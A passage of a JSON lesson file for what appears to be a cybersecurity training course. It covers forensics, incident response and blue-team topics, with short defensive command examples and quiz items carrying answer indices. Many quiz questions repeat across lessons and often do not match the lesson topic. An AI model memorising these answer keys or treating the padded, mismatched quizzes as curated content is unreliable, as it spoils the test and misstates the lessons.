with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"mobile-forensics-intro","cat":"Forensics & IR","title":"Mobile Forensics Intro","diff":2,"xp":150,"intro":"Extract and analyze data from smartphones.","sections":[{"type":"text","content":"Mobile forensics extracts call logs, messages, app data, location history, and deleted content. Tools range from manual to enterprise."},{"type":"code","lang":"bash","content":"# Android: ADB extraction\nadb backup -all -f backup.ab\n# Convert to tar\ndd if=backup.ab bs=24 skip=1 | openssl zlib -d > backup.tar\n# iOS: iTunes backup location\n# macOS: ~/Library/Application Support/MobileSync/Backup/\n# Tools: Cellebrite UFED, Magnet AXIOM, Autopsy\n# SQLite databases contain most app data\nsqlite3 sms.db 'SELECT * FROM message'"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Most mobile app data is stored in...","opts":["XML files","SQLite databases","Binary blobs","Cloud only"],"ans":1},{"type":"quiz","q":"The goal of threat hunting is...","opts":["Respond to alerts","Proactively find threats that evaded detection","Install patches","Write policies"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One strong firewall","Multiple overlapping security layers","Deep packet inspection only","Encrypting everything"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"wireshark-advanced","cat":"Forensics & IR","title":"Advanced Wireshark Filters & Analysis","diff":1,"xp":100,"intro":"Master display filters for surgical packet analysis.","sections":[{"type":"text","content":"Combine filters, follow streams, use statistics, and export specific conversations. Wireshark's power is in precise filtering."},{"type":"code","lang":"bash","content":"# Complex filters\n(http.request or tls.handshake.type eq 1) and !(ssdp)\nip.addr == 10.10.10.5 and tcp.flags.syn == 1 and tcp.flags.ack == 0\nframe contains \"password\"\ndns.qry.name contains \"evil\"\n# Statistics > Conversations (find heavy talkers)\n# Statistics > Protocol Hierarchy (traffic breakdown)\n# File > Export Objects > HTTP (extract files)\n# Right-click > Follow > TCP Stream"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"To find SYN-only packets (no ACK), use...","opts":["tcp.syn","tcp.flags.syn == 1 and tcp.flags.ack == 0","tcp.connect","syn.scan"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"eradication-recovery","cat":"Forensics & IR","title":"Eradication & Recovery in IR","diff":1,"xp":75,"intro":"Remove the threat completely, then restore operations safely.","sections":[{"type":"text","content":"Eradication: remove all malware, close backdoors, patch the vulnerability. Recovery: restore from clean backups, verify, monitor closely."},{"type":"code","lang":"bash","content":"# Eradication checklist:\n# 1. Remove all malware (every instance, every host)\n# 2. Close backdoor accounts\n# 3. Reset compromised credentials\n# 4. Patch the initial access vulnerability\n# 5. Remove persistence mechanisms\n# Recovery:\n# 1. Restore from VERIFIED clean backups\n# 2. Rebuild compromised systems from scratch\n# 3. Monitor closely for 30+ days\n# 4. Validate with a penetration test"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"After eradication, compromised systems should be...","opts":["Rebooted","Rebuilt from scratch or restored from clean backups","Left as-is with monitoring","Disconnected permanently"],"ans":1},{"type":"quiz","q":"The shared responsibility model means...","opts":["The cloud provider handles everything","Security is shared between provider and customer","The customer handles everything","No one is responsible"],"ans":1},{"type":"quiz","q":"Instance metadata is accessible at...","opts":["8.8.8.8","127.0.0.1","169.254.169.254","10.0.0.1"],"ans":2},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"log-management","cat":"Defense & Blue Team","title":"Log Management Best Practices","diff":1,"xp":75,"intro":"Centralize, retain, and protect your logs \u2014 they're your evidence.","sections":[{"type":"text","content":"Ship logs to a central SIEM. Set retention policies. Protect log integrity (write-once, hash). Logs are the first thing attackers delete."},{"type":"code","lang":"bash","content":"# Centralized syslog (rsyslog)\n# On each server, add to /etc/rsyslog.conf:\n*.* @siem.company.com:514\n# Retention: keep 90 days minimum (1 year for compliance)\n# Integrity: send to append-only storage (S3 with Object Lock)\n# Key logs to collect:\n# - Authentication (SSH, AD, VPN)\n# - Firewall allow/deny\n# - DNS queries\n# - Proxy/web access\n# - Endpoint (process creation, file changes)"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"The first thing attackers often delete is...","opts":["Configuration files","Logs","User accounts","Network shares"],"ans":1},{"type":"quiz","q":"Docker containers share the host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"Kubernetes secrets are stored as...","opts":["Encrypted by default","Base64 encoded (not encrypted)","Plain text","Hashed"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"nist-framework","cat":"Defense & Blue Team","title":"NIST Cybersecurity Framework","diff":1,"xp":75,"intro":"The standard framework: Identify, Protect, Detect, Respond, Recover.","sections":[{"type":"text","content":"NIST CSF organizes security into 5 functions. It's not a checklist \u2014 it's a risk-based approach to building a security program."},{"type":"code","lang":"bash","content":"# NIST CSF 5 Functions:\n# 1. IDENTIFY: asset inventory, risk assessment\n# 2. PROTECT: access control, encryption, training\n# 3. DETECT: monitoring, anomaly detection, IDS\n# 4. RESPOND: IR plan, communication, containment\n# 5. RECOVER: backup restoration, lessons learned\n\n# Implementation tiers:\n# Tier 1: Partial (ad hoc)\n# Tier 2: Risk Informed\n# Tier 3: Repeatable\n# Tier 4: Adaptive (continuous improvement)"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"The 5 NIST CSF functions are...","opts":["Plan, Do, Check, Act, Review","Identify, Protect, Detect, Respond, Recover","Assess, Remediate, Monitor, Report, Archive","Scan, Fix, Test, Deploy, Maintain"],"ans":1},{"type":"quiz","q":"A container escape gives access to...","opts":["Another container","The host system","The internet","Nothing"],"ans":1},{"type":"quiz","q":"The shared responsibility model means...","opts":["The cloud provider handles everything","Security is shared between provider and customer","The customer handles everything","No one is responsible"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"threat-intel-feeds","cat":"Defense & Blue Team","title":"Threat Intelligence Feeds","diff":1,"xp":100,"intro":"Stay ahead of attackers by consuming indicators of compromise.","sections":[{"type":"text","content":"Threat intel feeds provide IOCs (malicious IPs, domains, file hashes). Integrate them into your SIEM and firewall for proactive blocking."},{"type":"code","lang":"bash","content":"# Free threat intel sources:\n# - AlienVault OTX (otx.alienvault.com)\n# - Abuse.ch (bazaar.abuse.ch, urlhaus.abuse.ch)\n# - MISP (open-source threat intel platform)\n# - VirusTotal\n# - Shodan\n# Integration:\n# Download IP blocklist\ncurl -s https://rules.emergingthreats.net/blockrules/compromised-ips.txt > blocked_ips.txt\n# Block in firewall\nfor ip in $(cat blocked_ips.txt); do iptables -A INPUT -s $ip -j DROP; done"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"IOC stands for...","opts":["Internet Operations Center","Indicator of Compromise","Input/Output Control","Intrusion Operations Command"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","User credentials"],"ans":1},{"type":"quiz","q":"What is the main risk of active recon?","opts":["It's slow","The target can detect your scanning","It costs money","It requires admin access"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"security-awareness","cat":"Defense & Blue Team","title":"Security Awareness Training","diff":1,"xp":50,"intro":"The human firewall \u2014 training users is your best defense.","sections":[{"type":"text","content":"Most breaches start with a human: clicking a phishing link, reusing passwords, or plugging in a USB. Training reduces this risk."},{"type":"code","lang":"bash","content":"# Key training topics:\n# 1. Phishing recognition (hover before click)\n# 2. Password hygiene (unique passwords, use a manager)\n# 3. MFA everywhere\n# 4. Report suspicious emails (don't just delete)\n# 5. Physical security (lock screen, no tailgating)\n# 6. USB safety (never plug in unknown drives)\n# Simulate phishing: GoPhish (open-source)\n# gophish -admin-cert admin.crt -admin-key admin.key"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"The most common initial access vector in breaches is...","opts":["Zero-day exploits","Phishing","Brute force","Physical access"],"ans":1},{"type":"quiz","q":"Which tool is best for subdomain enumeration?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike Network"],"ans":0},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"tabletop-exercises","cat":"Defense & Blue Team","title":"Tabletop Exercises","diff":1,"xp":75,"intro":"Walk through an incident scenario without touching real systems.","sections":[{"type":"text","content":"A tabletop is a discussion-based exercise: 'Ransomware encrypted 50 servers. What do you do?' Tests your IR plan, communication, and decision-making."},{"type":"code","lang":"bash","content":"# Tabletop scenario 